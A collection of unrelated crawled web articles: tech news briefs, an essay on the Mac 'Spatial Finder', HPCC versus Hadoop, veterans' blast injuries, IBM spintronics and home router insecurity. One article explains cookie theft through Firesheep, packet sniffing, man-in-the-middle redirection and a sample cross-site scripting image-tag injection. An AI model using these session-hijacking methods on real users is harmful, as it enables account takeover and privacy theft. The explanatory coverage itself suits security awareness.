To renew the credentials — every three years for the CSEP and five for the ASEP — INCOSE also requires participation in continuing learning experiences within an allotted time period.
“The two main ways that you can earn PDUs [professional development units] are through taking some type of professional development such as university courses [or] internal training courses, [or] through volunteering,” which can include giving a paper at a systems engineering event or working on a professional standards committee, Walden said.
“The reason that we have a requirement for renewal is we want this to be a lifelong learning process,” he said.
Cyberkinetics, makers of the BrainGate, a neural implant that the physically impaired can use to control computers, said it will file an investigational device exemption with the FDA to conduct a pilot clinical trial this year.
Five quadriplegic participants will receive the implant.
BrainGate is a brain-computer interface consisting of an internal neural signal sensor and external processors that convert neural signals into output signals that a person controls and uses to operate a PC. The sensor consists of a tiny chip smaller than a children's aspirin, with 100 electrode sensors -- each thinner than a hair -- that detect brain cell electrical activity. The chip is implanted on the brain's surface in the area that controls movement. -- Cyberkinetics
The European Space Agency (ESA) has launched SMART-1, the first in a series of "Small Missions for Advanced Research in Technology" missions. The spacecraft is now heading for the moon using a revolutionary propulsion technique and carrying an array of miniaturized instruments, the ESA said.
The main purpose of the SMART-1 mission is to flight-test new solar-electric propulsion technology -- a kind of solar-powered thruster, or "ion" engine, that is 10 times more efficient than the usual chemical systems used for space travel.
Solar-electric propulsion does not burn fuel as chemical rockets do. The technique converts sunlight into electricity via solar panels and uses it to electrically charge heavy gas atoms, which accelerate away from the spacecraft at high speed and drive the spacecraft forward. -- The European Space Agency
X Doesn't Mark the Spot
Researchers from Lucent Technologies' Bell Labs have developed new software that gives users tighter control over the sharing of location information generated by cell phones, personal digital assistants and other mobile devices.
Bell Labs' newly developed Privacy-Conscious Personalization framework relies on user preferences to intelligently infer a user's context, such as working or shopping, and then determines how that location information should be shared.
When a user's location or other information is requested, the request is checked against the user's preferences and filtered through a high-performance rules engine, known within Bell Labs as "Houdini," before any action is taken. Since location and other mobile services require near-real-time performance, this entire process can take a few milliseconds or less. -- Bell Labs
Video Game Workout
Powergrid Fitness' kiloWatt -- a new game controller for Sony PlayStation 2, Microsoft Xbox and PC games -- turns video games into workouts.
Powergrid Fitness took the two thumb-stick controls on standard PlayStation 2 and Xbox game controllers and blended them together into a single shoulder-height joystick. When you push it, sensitive strain gauge sensors measure the microscopic flex in the alloy metal resistance rod, and a microprocessor calculates how hard you're pushing.
kiloWatt measures force rather than motion, and kiloWatt's sensors are adjustable in real time, so the effort level can be made easy, brutal or somewhere in between. The kiloWatt system is composed of a structural steel platform base, an alloy steel resistance rod, an engineering polymer game controller and a strain gauge sensor array. -- Powergrid Fitness
Toshiba and Digital Fashion Ltd. will jointly create a three-dimensional fashion simulation system to allow virtual modeling and coordination of clothes, cosmetics and accessories in real time.
The system will capture images of people, outfit them in the virtual clothes of their choice, and then display natural-looking images in real time, including movement of the person and the clothes.
The new simulation system will reproduce real-time three-dimensional images of movement in front of a display equipped with cameras, along with the textures, shades and real appearance of the chosen material and clothing. Using the simulation system will offer the same sense of reality as a real mirror. Commercialization of the system is expected in 2006. -- Toshiba | <urn:uuid:e786ef09-5bdd-4081-aaa4-9520cc122212> | CC-MAIN-2017-09 | http://www.govtech.com/health/99413994.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170651.78/warc/CC-MAIN-20170219104610-00292-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.894945 | 794 | 2.921875 | 3 |
The Spatial Finder
The only real, physical parts of the personal computer interface are the screen in front of you and the mouse and keyboard under your hands. We will not consider alternate input/output devices in this article. It's what's happening on the screen that we're interested in.
Here we have a veritable blank slate: a two-dimensional image made up of thousands of colored dots. But there are many constraints that are beyond our control--or at least beyond the scope of this article. As I said earlier, this will be a fairly conservative vision of what the Finder could be; the basics of windows, icons, menus, and pointing device ("WIMP") will remain unchanged.
So, what parts of the Finder can benefit from spatial orientation? And what is this "Spatial Finder" that's mentioned so often? Truth be told, I'm not always sure what other people mean when they use that term. But I can tell you my definition.
The Spatial Finder endows its windows with the properties of actual objects in space that are most beneficial to the usability of the application. Again, this is not a blind imitation of reality. Properties of real objects that do not benefit usability are simply not carried over. For example, you can type and then erase characters from a file or folder name forever without causing any eraser smudges.
It's the useful properties of real objects in space that make the Spatial Finder what it is (or "was", since the last Finder that can reasonably be called "spatial" was in Mac OS 9). These properties are:
- Coherency: each window is permanently, unambiguously associated with a single folder.
- Stability: files, folders, and windows go where you move them, stay where you put them, and retain all their other "physical" characteristics: size, shape, color, location, etc.
That's it! It seems simple because it really is. But these two properties have far-reaching consequences that go a long way towards making the Finder more usable.
Objects in the real world are notoriously coherent and stable. It's extremely difficult to get anything more than a one-to-one relationship between, say, your hand and the $20 bill you're holding. The bill is in your hand and your hand is holding the bill. If you could make that same bill appear in one or more other locations simultaneously (or vice versa with your hand), you'd be a very rich (or very handy) person. Similarly, if that bill starts to change size, shape, color, or location without any outside force acting on it, then you're probably asleep and having a very odd dream.
To understand how coherency and stability benefit the Finder, let's consider an even more basic part of the Mac GUI: icons. To paraphrase Arthur C. Clarke, any sufficiently advanced illusion is indistinguishable from reality. Nothing proved this more profoundly than the use of icons in the Mac GUI.
Back in 1984, explanations of the original Mac interface to users who had never seen a GUI before inevitably included an explanation of icons that went something like this: "This icon represents your file on disk." But to the surprise of many, users very quickly discarded any semblance of indirection. This icon is my file. My file is this icon. One is not a "representation of" or an "interface to" the other. Such relationships were foreign to most people, and constituted unnecessary mental baggage when there was a much more simple and direct connection to what they knew of reality.
"Under the covers", of course, each file on disk was actually two "files" in the Mac file system's volume structures (a data "file" and a resource "file"), plus assorted pieces of metadata--including the icon itself!--stored in other locations entirely. But to the user, these separate pieces appeared as a single, indivisible item that was inextricably bound to the mental conception of "my file." The illusion was so well executed and so relentlessly consistent that users trusted it implicitly. "This icon is my file."
This same coherency also extended to Finder windows, to the degree that a Mac user might not have understood what you meant by "Finder window" back in the days before Mac OS X. "Oh, you mean this folder." There was no such thing as a "Finder window" that "displayed the contents of a folder." Double-clicking a folder opened it. The resulting window was the folder. When scrolling, moving, or resizing that window, there was no doubt about which folder was being affected. And the stability of the interface was such that there was no doubt about what that folder would look like the next time it was opened.
The illusion was so powerful and so like the familiar physical world that the Finder itself disappeared as a separate entity. It has been said that "the interface is the computer", meaning that the average user makes no distinction between the way he interacts with the computer and the reality of the computer's internal operation. If the interface is hard to use, the computer is hard to use, and so on. The interface is the computer.
In the days of classic Mac OS, the Finder was the interface--and, by extension, was the computer. When people raved about the Mac's "ease of use" (especially back in the days when the Mac was home to the only mass-market personal computer GUI) what they were really raving about was the Finder. Applications may or may not have had pleasing, usable interfaces, but they were clearly "not the computer." Applications ran on the computer. You launched applications, and then quit them. The Finder was what you saw when all the applications were closed. There was no closing the Finder. To close the Finder meant to turn off the computer. The Finder was the computer.
And, no, it wasn't the single-tasking nature of the early Mac operating system that caused this feeling, for it continued long after the introduction of MultiFinder and, later, System 7. It was the meticulously constructed, relentlessly maintained illusion that files and folders were real, physical things existing inside the computer that you could manipulate in familiar, direct, predictable ways.
This illusion worked despite the fact that objects in the Finder could do things that real objects cannot. Real objects cannot disappear and reappear instantly, for example. But such behaviors in the Finder were examples of what computers had always done: make things faster. Although clicking the close box on a window made it disappear instantly, it was merely shorthand for a well understood spatial act (putting an item away), and had accompanying "visual shorthand" in the form of "zoomrects." The rules were the same; the action was just hastened. There was no question about "where the folder went." It was where you found it, of course. In a sensible world, how could it be otherwise?
The Spatial Finder is spatial where it counts. It's spatial where a failure to do so would lead to confusion or decrease efficiency. For example, if there was a one-to-many relationship between folders and windows, the connection between the act of window manipulation and the state of the folders themselves would be lost. This can be demonstrated quite easily in the Mac OS X Finder. Simply show the contents of the same folder in two different windows, move one window to one location on the screen and the other window to another location, and finally close both windows. When you open that folder again, where will the window be?
It's dangerously easy to defeat spatial orientation. Even the smallest disconnection shatters the illusion, turning what was once an utterly convincing and understandable world of files and folders into an arbitrary heap of windows, full of icons and widgets, signifying nothing.
When the spatial state of objects (size, color, position, etc.) cannot be relied upon as a means to identify and manipulate them, it ceases to be a useful method of interaction.
This is exactly what we don't want in an interface. Interfaces that do not play to the strengths of human perception and motor coordination are just plain "leaving money on the table", as the saying goes. They are necessarily less efficient than they could be. | <urn:uuid:1ccb627b-5d94-4d70-b893-445b0600b0a7> | CC-MAIN-2017-09 | https://arstechnica.com/apple/2003/04/finder/3/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170651.78/warc/CC-MAIN-20170219104610-00292-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.966416 | 1,700 | 2.546875 | 3 |
When you hear the expression "big data," the next word you will often hear is "Hadoop." That's because the underlying technology that has made massive amounts of data accessible is based on the open source Apache Hadoop project.
From the outside looking in, you would rightly assume then that Hadoop is big data and vice versa; that without one the other cannot be. But there is a Hadoop competitor that in many ways is more mature and enterprise-ready: High Performance Computing Cluster.
Like Hadoop, HPCC is open-sourced under the Apache 2.0 license and is free to use. Both likewise leverage commodity hardware and local storage interconnected through IP networks, allowing for parallel data processing and/or querying across the architectures. This is where most of the similarities end, says Flavio Villanustre, vice president of information security and the lead for the HPCC Systems initiative within LexisNexis.
HPCC Older, Wiser Than Hadoop?
HPCC has been in production use for more than 12 years, though the HPCC open source version has been available for only a little more than a year. Hadoop, on the other hand, grew out of the open source Nutch web-crawler project, which drew on techniques Google published for parsing and analyzing massive data sets, and it wasn't even its own Apache project until 2006. Since that time, though, it has become the de facto standard for big data projects, far outpacing HPCC's 60 or so enterprise users. Hadoop is also supported by an open source community in the millions and an entire ecosystem of start-ups springing up to take advantage of this leadership position.
That said, HPCC is a more mature enterprise-ready package that uses a higher-level programming language called Enterprise Control Language (ECL) based on C++, as opposed to Hadoop's Java. This, says Villanustre, gives HPCC advantages in terms of ease of use as well as backup and recovery in production. Speed is enhanced in HPCC because C++ runs natively on top of the operating system, while Java requires a Java virtual machine (JVM) to execute.
HPCC also possesses more mission-critical functionality, says Boris Evelson, vice president and principal analyst for Application Development and Delivery at Forrester Research. Because it's been in use for much longer, HPCC has layers (security, recovery, audit and compliance, for example) that Hadoop lacks. Lose data during a search and it's not gone forever, Evelson says. It can be recovered like a traditional data warehouse such as Teradata.
Rags Srinivasan, senior manager for big data products at Symantec, wrote about this shortcoming in a May 2012 blog post on issues with enterprise Hadoop: "No reliable backup solution for Hadoop cluster exists. Hadoop's way of storing three copies of data is not the same as backup. It does not provide archiving or point in time recovery."
Although Hadoop is less mature in these areas, it's not intended to be used in a production environment, so these distinctions may not be that important at the moment, says Jeff Kelly, big data analyst at Wikibon. What it's being used for is analyzing massive amounts of data to find correlations between heretofore hard-to-connect data points. Once these points are uncovered, the data is often moved to a more traditional business intelligence solution and data warehouse for further analysis.
"Currently, the most common use case for Hadoop is as a large-scale staging area," Kelly says. "Essentially [it is] a platform for adding structure to large volumes of multi-unstructured data so that it can then be analyzed by relational-style database technology."
ECL: A High-Level Query Language With a Drag-and-Drop Interface
Another key benefit of ECL, Villanustre says, is that it's very much like high-level query languages such as SQL. If you're a Microsoft Excel maven, then you should have no trouble picking up ECL.
Developing queries is further simplified by the work HPCC has done with analytics provider Pentaho and its open source Kettle project, which lets users create ECL queries in a drag-and-drop interface. This isn't possible with Hadoop's Pig or Hive query languages yet.
HPCC is also designed to answer real-world questions. Hadoop requires users to put together separate queries for each variable they seek; HPCC does not.
"ECL is a little bit like SQL...in that it is declarative, so you tell the computer what you want rather than how to do it," Villanustre says. Pig and Hive, on the other hand, are quite primitive. "They are hard to program, they are hard to maintain and they are hard to extend and reuse the code-which are the key elements for any computer language to be successful."
Hadoop's Advantages? It's Scalable, Flexible, Inexpensive
Charles Zedlewski, vice president of products at Cloudera, disagrees with this perspective. Cloudera, after all, is among the best-known and most successful Hadoop start-ups, providing turnkey Hadoop implementations to companies as diverse as eBay, Chevron and Nokia.
"In fact, today Hadoop probably has the ability to cater to a wider range of end users than the data management systems that have come before, and that has always been the strength of Hadoop," Zedlewski says. "The three things that Hadoop does really well is it's very scalable, it's very flexible and very inexpensive."
As well as being flexible and robust, it's this last point that has so many people interested in Hadoop. However, while Hadoop runs on commodity hardware, you either have to hire someone to put everything together or find a third-party provider such as Cloudera to do it for you. With HPCC, much of the functionality you need is available out of the box, and it runs on commodity boxes as well.
In the final analysis, on the one hand, if you're looking for a more robust solution that provides enterprise-grade functionality, then HPCC may be the way to go. On the other hand, if you just want to get a feel for what big data is all about, then Hadoop may be the better alternative, since it has a massive open-source ecosystem of developers working on it daily and a host of third-party companies springing up to take advantage of the opportunity big data represents.
"The macro trend that is driving all this is the explosion of data," Zedlewski says. "Data is growing faster than Moore's Law, which is requiring this different architecture and different way of working with data. And the reason it's growing faster than Moore's Law is because more and more things are getting hooked up to computers, whether it be your house, your TV, your cell phone, the flight you took. When that happens, they all wind up generating data at prodigious rates."
Allen Bernard is a Columbus, Ohio-based writer who covers IT management and the integration of technology into the enterprise.
This story, "HPCC Takes on Hadoop's Big Data Dominance" was originally published by CIO. | <urn:uuid:0b10d0a1-bcc0-4312-b07a-51071abb98fa> | CC-MAIN-2017-09 | http://www.itworld.com/article/2711829/big-data/hpcc-takes-on-hadoop-s-big-data-dominance.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171834.68/warc/CC-MAIN-20170219104611-00344-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.9559 | 1,604 | 2.71875 | 3 |
Troops exposed to blasts in Afghanistan and Iraq “have an increased risk of developing adverse health outcomes over the long term,” including post-traumatic stress disorder, traumatic brain injury, persistent headaches and growth hormone deficiency, according to a report released Thursday.
"Acute physical and psychological health outcomes in people who survive blast explosions can be devastating, but the long-term consequences are less clear, particularly for individuals who show no external signs of injury from exposure to blast waves or may not even be aware that they were exposed,” said Stephen Hauser, chairman of department of neurology of the University of California, San Francisco, and chair of the Institute of Medicine committee that wrote the blast report.
Some 2.2 million troops served in Iraq and Afghanistan over the past 13 years, with 21,556 physically wounded by blasts from improvised explosive devices and 244,217 diagnosed with traumatic brain injury, IOM reported.
VA commissioned the IOM report because it was concerned about blast injuries, considered the signature wound of the long wars in Afghanistan and Iraq. The 192-page report on blast exposure's long-term repercussions is the latest in a series of IOM studies on the health effects of war since 1998, after the first Iraq War.
Blast exposure may result in long-term hearing damage and muscle or bone impairment such as osteoarthritis, IOM found. “However, the data on these outcomes were not strong enough to draw a direct cause-and-effect relationship,” the institute said. There was only tentative evidence to link blast exposure to long-term effects on cardiovascular and pulmonary function, substance-abuse disorders and chronic pain in the absence of a severe, immediate injury, the report said.
While there is substantial overlap between symptoms of mild TBI and PTSD, limited evidence suggests that most of the shared symptoms could be a result of PTSD and not a direct result of TBI alone, the IOM report said.
The report recommended Defense develop and deploy data collection technologies that quantitatively measure components of blast and characteristics of the exposure environment in real time and also link them with self-reported exposure histories and demographic, medical and operational information.
It also suggested VA create a database that links Defense records for troops with blast injuries to VA health records to "facilitate long term health care needs after blast injury." VA should create a registry of blast-exposed veterans to serve as a foundation for long-term studies.
VA also needs to develop clinical practice guidelines for blast-related injuries other than PTSD and TBI and needs to encourage its clinicians to ask veterans about blast exposure, IOM recommended.
Cookies still remain one of the largest areas of computing that the average user just doesn't understand, and there are a myriad of different ways that a hacker can take advantage of cookies to steal a user's personal information. Cookie stealing, which is synonymous with session hijacking, allows an attacker to log into a website that is protected with a user's username and password by stealing session data in real time. But before we delve into the different ways of stealing cookies, we first need to understand what a session is and how cookies work.
What is a Session?
“Session” is a term in computing – more specifically, networking – that gets thrown around a lot, but it can seem like jargon to the aspiring hacker. Most concepts in computer networking are in some way related to the OSI model, which is composed of seven different layers that map different stages and processes of data exchange between two remote computing systems. More importantly, the fifth layer is called the Session layer, and this is where the term “session” gets its name.
Within the Session layer of the OSI model, you’ll find common protocols such as SOCKS (a common type of proxy server connection), PPTP (Point to Point Tunneling Protocol), RTP (Real-time Transport Protocol), and others that aren’t as well known. However, when someone talks about session hijacking, they’re most often referring to a session between a client computer and a web server. In this context, “session” basically means a semi-constant exchange of information between two hosts. In contrast, consider constant exchanges through other protocols such as VPN tunnels, whereby the connection is permanent (barring technical difficulties, of course).
In a session, two computers exchange information and authentication credentials to lay the groundwork for future communications. Take Facebook, for example. After you have logged into the Facebook service, you can browse through your feed, chat with friends, and play games until you intentionally choose to log out. If a session hadn’t been built between your computer and the Facebook servers, you would need to continually login again and again every time you wanted a new piece of data. Fortunately, you don’t have to, because all of your connection information is stored within a cookie.
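As a rough illustration of what a session buys you, here is a hedged Python sketch using the requests library; the URLs and form fields are placeholders rather than a real service, but the pattern (authenticate once, then let the stored session cookie ride along with later requests) is the one described above.

```python
# Illustrative only: the URLs and form fields below are made-up placeholders.
import requests

session = requests.Session()

# Log in once; the server replies with a session cookie, which the
# Session object stores automatically.
session.post("https://example.com/login",
             data={"username": "alice", "password": "correct horse battery"})

# Later requests re-send that cookie, so there is no need to log in
# again for every page view -- this is the "semi-constant exchange".
profile = session.get("https://example.com/me")

print(session.cookies.get_dict())   # the stored session identifier(s)
print(profile.status_code)
```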
What is a Cookie?
Cookies are small repositories of data that are stored within your web browser by a web server. They are rife with security concerns, and some of them can even track your online activity. Whenever you visit a web site, the cookie stored in your browser serves as a type of ID card. Each additional time you log in or request resources from the same web server, the cookie saved in your browser sends its stored data to the web server. This allows web site administrators, and even Internet marketers, to see which of their pages are getting the most hits, how long users stay on each page, which links they click on, and a wealth of other information.
Furthermore, cookies are used to make a website more personal. Many sites offer preference options to let you customize the look, feel, and experience of any given web service. Once you revisit the site or resource, you’ll find that all your preferences were preserved. Though cookies make browsing the web a lot more convenient, they do have a lot of security drawbacks, as we’ll discuss next.
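Before moving on, it helps to see what one of these small data repositories actually looks like. The short Python sketch below uses the standard library's http.cookies module; the cookie name, value, and attributes are invented for illustration.

```python
# Build and print a made-up cookie using only the standard library.
from http.cookies import SimpleCookie

jar = SimpleCookie()
jar["sessionid"] = "9f2c1d8ab"        # an invented session identifier
jar["sessionid"]["path"] = "/"        # send it with every URL on this site
jar["sessionid"]["max-age"] = 3600    # keep it for an hour
jar["sessionid"]["secure"] = True     # only transmit over HTTPS
jar["sessionid"]["httponly"] = True   # hide it from page scripts

# Roughly the header a web server would send to your browser:
print(jar.output())
# e.g.  Set-Cookie: sessionid=9f2c1d8ab; HttpOnly; Max-Age=3600; Path=/; Secure
```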
Types of Cookies and Security Problems
In theory, the only online entity that can read a cookie stored in your browser is the website that stored it there originally. However, it's surprisingly easy for scripts to mine data from cookies, and there are some exceptionally dangerous types of cookies that are rife with security threats. Mainly, the types of cookies that are the most fearsome are named Flash cookies, zombie cookies, and super cookies.
Even though your browser has ways to manage cookies, some are nearly impossible to delete. The problem is that special types of cookies aren’t stored within your browser, so even if you opt for a different web browser (Firefox, Chrome, etc.), the cookie will still be active. And many of these types of cookies are much larger than the average 4KB HTTP cookies – some of them ranging to 100KB or even 1MB. If you attempt to delete the cookie but notice that it keeps coming back every time you restart your browser, you’ve discovered a zombie cookie and may need special security software to remove it.
Viewing Your Cookies and Managing Them
You might now be wondering just how many cookies you have stored in your browser, and what you can do to proactively manage them and avoid the disaster of having an attacker hijack your session. Just about every browser has useful extensions that allow users to manage, back up, delete, secure, and view their cookies. All it takes is a simple search through your browser's add-ons menu, though for Firefox users, I highly recommend the View Cookies add-on.
Though you can navigate through the file system and see the cookies individually (which are stored in different places by different browsers), I think the add-ons are the best way to go. Furthermore, just about every browser has settings that allow users to completely disable cookies or set limitations, such as disallowing any cookies that are greater than X number of kilobytes or megabytes in size. Lastly, many browsers even have a setting that specifically disables Flash cookies.
The Easiest Way to Steal Cookies
There are a number of ways that someone can steal another user’s cookies. From cross site scripting attacks to viruses embedded in seemingly harmless software, modern hackers have a lot of tools in their tool belt to hijack an unsuspecting user’s session. Many of these advanced attacks require a lot of background knowledge and expertise in networking protocols, software development, and web technologies to carry out the attack.
Unfortunately for average users, there is one way to steal cookies that is easier than any other attack method, and that's by using simple tools over a local LAN. But getting access to a local LAN isn't as challenging as it may seem. You can view any of our other posts on just how easy it is to crack wireless encryption protocols, but try to imagine where the easiest place is for hackers to connect with other users over a local LAN. Can you guess where it is?
That’s right, on public Wi-Fi networks such as those found at airports and your local Internet café – heck, even a Starbucks. You don’t even need any fancy command line tools or advanced packet sniffing knowledge to steal cookies. Nope, all you need is a Firefox extension called Firesheep. Though it isn’t currently supported on Linux, it is available on Mac OS X and Windows (XP and later versions, dependent on the Winpcap package).
Firesheep is a simple to use Firefox extension that leverages underlying packet sniffing technology to detect and copy cookies that are sent in an unencrypted format. If the cookie is sent across the network in an encrypted format, there’s not much this tool can do, however. But Firesheep makes it ludicrously simple to hijack a user’s session. As the extension sniffs out cookies, it populates a list of them on the sidebar of your browser in real-time. Once an unencrypted cookie has been discovered, the user (it’s so simple I doubt it’s fair to use the term hacker) simply needs to double-click on the cookie and they’ll automatically hijack the session and log in as the unsuspecting user.
Given that Mozilla is a legitimate and trustworthy organization, it's a little odd that they wouldn't blacklist the extension. However, Mozilla had stated that they only use their blacklist to mark code and add-ons that contain spyware and other such security threats. Since this tool doesn't harm the user's browser, it seems that it's still available. But even if they did disable it, attackers would still be able to use the tool since Firefox contains a feature that effectively disables the blacklist.
Packet Sniffers and Man-in-the-Middle Attacks
Firesheep is essentially a packet sniffing add-on that is ridiculously user-friendly. However, advanced users can take advantage of other packet sniffers, such as Wireshark, to steal cookies. This method is a lot harder, though, and takes some preexisting knowledge of how to work in Wireshark. We won't detail the process of starting a Wireshark packet capture here, but we do want you to understand how they work.
Man-in-the-Middle attacks and DNS based attacks are very common, and they both work to redirect a user’s traffic to a computer system that the hacker controls – such as their personal computer, a server, or a networking device (router, firewall, proxy server, etc.). Once the hacker has hoodwinked the end user’s computer and/or the default gateway into sending their data to the hacker’s networking interface, the attacker can see everything that isn’t encrypted. Naturally, this includes cookies, so all a hacker would have to do is run a capture, analyze collected traffic, and pluck the cookie data out of their results before the user disconnects or logs out.
Cross-Site Scripting (XSS)
Last but not least, cross-site scripting is another popular way to steal cookies from a user. If you remember, most often only the website that stored a cookie can access it, but this isn't always the case. Cross-site scripting works by injecting malicious scripts (most often JavaScript) into web pages, web pages that may or may not be owned by the hacker (though often they are not).
Though security controls are always increasing, there are still a vast number of websites vulnerable to XSS attacks. It can even be a simple website like a forum. For example, consider a forum that allows image tags. They could post a link in an image tag with code such as the following: <img src=MyBadScript.html/>
Other times, they may simply link to a web resource that contains their script. Once the script executes in the user's web browser, the attacker's code runs and can send copies of any accessible cookies to a location the attacker controls, such as a remote server or logging script.
Remember that the idea here is to learn how to protect yourself, and others, from becoming the victim of a cookie-stealing attack. Though it would be simple to run Firesheep, I'd highly advise against doing anything illegal. Also remember to respect other users' privacy.
In a paper set to be published this week in the scientific journal Nature, IBM researchers are claiming a huge breakthrough in spintronics, a technology that could significantly boost capacity and lower power use of memory and storage devices.
Spintronics, short for "spin transport electronics," uses the natural spin of electrons within a magnetic field in combination with a read/write head to lay down and read back bits of data on semiconductor material.
By changing an electron's axis in an up or down orientation -- all relative to the space in which it exists -- physicists are able to have it represent bits of data. For example, an electron on an upward axis is a one, and an electron on a downward axis is a zero.
Spintronics has long faced an intrinsic problem because electrons have only held an "up or down" orientation for 100 picoseconds. A picosecond is one trillionth of a second (one thousandth of a nanosecond). One hundred picoseconds is not enough time for a compute cycle, so transistors cannot complete a compute function and data storage is not persistent.
In the study published in Nature, IBM Research and the Solid State Physics Laboratory at ETH Zurich announced they had found a way to synchronize electrons, which could extend their spin lifetime by 30 times to 1.1 nanoseconds, the time it takes for a 1 GHz processor to cycle.
The IBM scientists used ultra short laser pulses to monitor the evolution of thousands of electron spins that were created simultaneously in a very small spot, said Gian Salis, co-author of the Nature paper and a scientist in the Physics of Nanoscale Systems research group at IBM Research.
Usually, such spins find electrons randomly rotating and quickly losing their orientation. In this study, IBM and ETH researchers found, for the first time, how to arrange the spins neatly into a regular stripe-like pattern -- the so-called persistent spin helix.
The concept of locking the spin rotation was originally proposed as a theory back in 2003, Salis said. Since then, some experiments found indications of such locking, but the process had never been directly observed until now, he added.
"These rotations of direction of spin were completely uncorrelated," Salis said. "Now we can synchronize this rotation, so they don't lose their spin but also rotate like a dance, all in one direction."
"We've shown we completely understand what's going on there, and we've proven that the theory works," he added.
The IBM researchers have been using gallium arsenide, a material commonly used today in electronics, diodes and solar cells, as their primary semiconductor material.
Today's computing technology encodes and processes data by the electrical charge of electrons. However, researchers say the technique becomes limited as semiconductor dimensions shrink to the point where the flow of electrons can no longer be controlled.
For example, NAND flash products already use circuitry that is less than 20 nanometers in width, which is approaching atomic size. Spintronics could surmount this memory impasse by harnessing the spin of electrons instead of their charge.
The new understanding of spintronics can not only give scientists unprecedented control over the magnetic movements inside devices, but also opens new possibilities for creating more energy efficient electronic devices.
IBM is not alone in its pursuit of spintronics technology research.
Three years ago, physicists from the Institute of Materials Physics and Chemistry in Strasbourg, France, built new laser technology on the foundation of spintronics and won the 2007 Nobel physics prize for the effort.
The French physicists discovered a way to use lasers to accelerate storage I/O on hard discs by up to 100,000 times current read/write methods.
A problem with spintronics had been the slow speed of magnetic sensors that are used to detect bits of data. But according to the 2007 French study, published in the scientific journal Nature Physics, the team used a "Femtosecond" laser, which produces super-fast laser bursts to alter electron spin, speeding up the read/write process.
IBM's researchers said their breakthrough opens the door for efforts to create transistors and non-volatile storage that would use considerably less power than today's NAND flash technology.
However, one rather large sticking point is that researchers haven't been able to produce their results at room temperature, an important requirement for producing a viable processor or memory device. Currently, experiments take place at a very low temperature of 40 kelvins (about -233 degrees Celsius, or -387 degrees Fahrenheit).
"There's no device for this yet, but it's a breakthrough in that we now know how to increase the electron's spin lifetime in channel," Sails said. "Next, one thing we'd really like to do is increase that [spin lifetime] by a factor of 30."
Lucas Mearian covers storage, disaster recovery and business continuity, financial services infrastructure and health care IT for Computerworld.
This story, "IBM claims spintronics memory breakthrough" was originally published by Computerworld. | <urn:uuid:577be04a-14ad-4b00-95b8-4a3a1296a328> | CC-MAIN-2017-09 | http://www.itworld.com/article/2725460/storage/ibm-claims-spintronics-memory-breakthrough.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172156.69/warc/CC-MAIN-20170219104612-00520-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.940657 | 1,094 | 3.578125 | 4 |
Home routers and other consumer embedded devices are plagued by basic vulnerabilities and can't be easily secured by non-technical users, which means they'll likely continue to be targeted in what has already become an increasing trend of mass attacks.
Computer OSes have advanced considerably from a security standpoint over the last decade, with their creators strengthening code and adding a variety of protections. However, routers, modems, wireless access points and other "plug-and-forget" devices have lagged behind as their makers lacked strong incentives to secure them. As a result, those devices can now pose a significant threat to the online security of users, contrary to the long-held belief that connecting a computer through a home router is better than exposing it directly to the Internet.
Routers and other embedded devices have simply not been on attackers' radar until now, at least not on a significantly large scale, but that's starting to change and if the attacks observed this year are any indication, it might be happening at a faster pace than manufacturers can react.
Because routers can affect all other local devices that access the Internet through them, they are a rich target, said Trey Ford, global security strategist at security firm Rapid7, via email. "Users expect a website to be authentic, and a compromised router (DSL router, gateway, wireless access point, cable modem -- take your pick) allows a malicious party to undermine that trust. The trend of connecting more devices to the Internet only means there is more for attackers to play with."
For instance, in early February incident responders from the Polish Computer Emergency Response Team warned that thousands of home routers in the country had their DNS settings hijacked by attackers in an attempt to intercept online banking connections. Later that month security researchers from the SANS Institute's Internet Storm Center (ISC) discovered a worm that was infecting Linksys E-Series routers and then in March Internet security research organization Team Cymru reported that a global attack campaign compromised 300,000 home and small-office wireless routers.
Other significant incidents this year include thousands of Asus routers exposing to the Internet the content of hard drives attached to them, Hikvision DVRs being infected with Bitcoin mining malware due to a default root password and exposed telnet service, and millions of home routers being exposed to DNS-based DDoS amplification abuse.
This year antivirus companies have also found malware binaries compiled for architectures commonly used on embedded devices like ARM, PPC, MIPS and MIPSEL, as well as botnets that attempt to access routers using easy-to-guess credentials.
Carsten Eiram, the chief research officer at vulnerability intelligence firm Risk Based Security, believes that attackers have begun shifting focus from exploiting vulnerabilities in popular client applications to targeting routers because many software developers have stepped up their game by improving their code and adding security mechanisms to their programs.
"Embedded devices like home routers are an obvious choice [as new targets for attackers]," Eiram said via email. "They're used by 'everyone,' the code maturity from a security perspective is usually terrible, and they have no real security mechanisms in place, making exploitation easier."
Device manufacturers are far behind when it comes to secure programming, he said. "The vulnerabilities being found are often very basic issues straight out of the 1990's like buffer overflows and OS command injection. We've even seen reports of blatantly obvious back-door like 'features'."
Many vendors are also unprepared to deal with security issues and don't seem to have any real security program in place, either for the development process or for handling vulnerabilities reported to them, Eiram said.
The standard networking equipment provided by ISPs to their customers can increase the threat of large-scale attacks because any critical vulnerability discovered in such devices can result in millions of potential targets with uniform configurations that are easy to attack.
These vulnerabilities are not uncommon. On Tuesday a researcher released details about vulnerabilities found in the standard ADSL/Fiber Box devices supplied by French ISP SFR to its customers and in January, a different researcher found critical vulnerabilities in the standard EE BrightBox router supplied by U.K. ISP EE. SFR has a broadband customer base of 5.2 million, according to its website, and EE, a joint venture between Deutsche Telekom and Orange, claims that its fiber broadband service reaches 15 million U.K. households.
Ilia Kolochenko, the CEO of Geneva-based security firm High-Tech Bridge, believes it's not only manufacturers that are to blame for the poor security of routers. Many users are often the bigger problem because they don't even change the default admin password on their devices, leaving the door wide open for attackers, he said via email.
However, Kolochenko agreed that updating and configuring routers can prove difficult for non-technical people and thinks that ISPs should educate their customers about the importance of configuring their routers in a secure way, just like they advise them on securing their PCs.
"Right now, it would be good if people at least realized that their home routers should also be secured, as they are not just 'devices to plug-in and forget about'," he said. "Then they can hire IT consultants from their ISPs -- many offer telephone consulting and guidance for free -- or ask IT-savvy friends to check if their router is secure."
"The majority of installed embedded devices -- not just routers, but TVs, storage devices and anything else you place in that 'Internet of Things' bucket -- do not automatically update," Ford said. "This means they do not automatically install important security fixes that address issues like these."
